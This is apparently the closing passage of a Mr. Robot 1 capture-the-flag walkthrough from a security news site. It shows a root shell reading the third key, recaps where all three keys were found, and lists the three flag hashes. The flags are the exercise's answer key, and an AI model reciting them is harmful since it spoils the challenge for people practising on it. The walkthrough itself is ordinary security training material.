 firstboot_done  key-3-of-3.txt
 #
 cat key-3-of-3.txt
 04787ddef27c3dee1ee161b21670b4e4
  • As you can see, we have found the third key.
  • We have found all 3 keys: the 1st key was in https://192.168.1.4/robots.txt
  • the 2nd key was in the robot home directory
  • the 3rd key was in the root directory.
  • As per the ethical hacking researcher of International Institute of Cyber Security, CTF challenges are a good way to practice your hacking skills.
key-1-of-3.txt - 073403c8a58a1f80d943455fb30724b9 
key-2-of-3.txt - 822c73956184f694993bede3eb39f959
key-3-of-3.txt - 04787ddef27c3dee1ee161b21670b4e4

The post Mr. Robot 1 – Capture The Flag Challenge, walk through appeared first on Information Security Newspaper | Hacking News.

]]>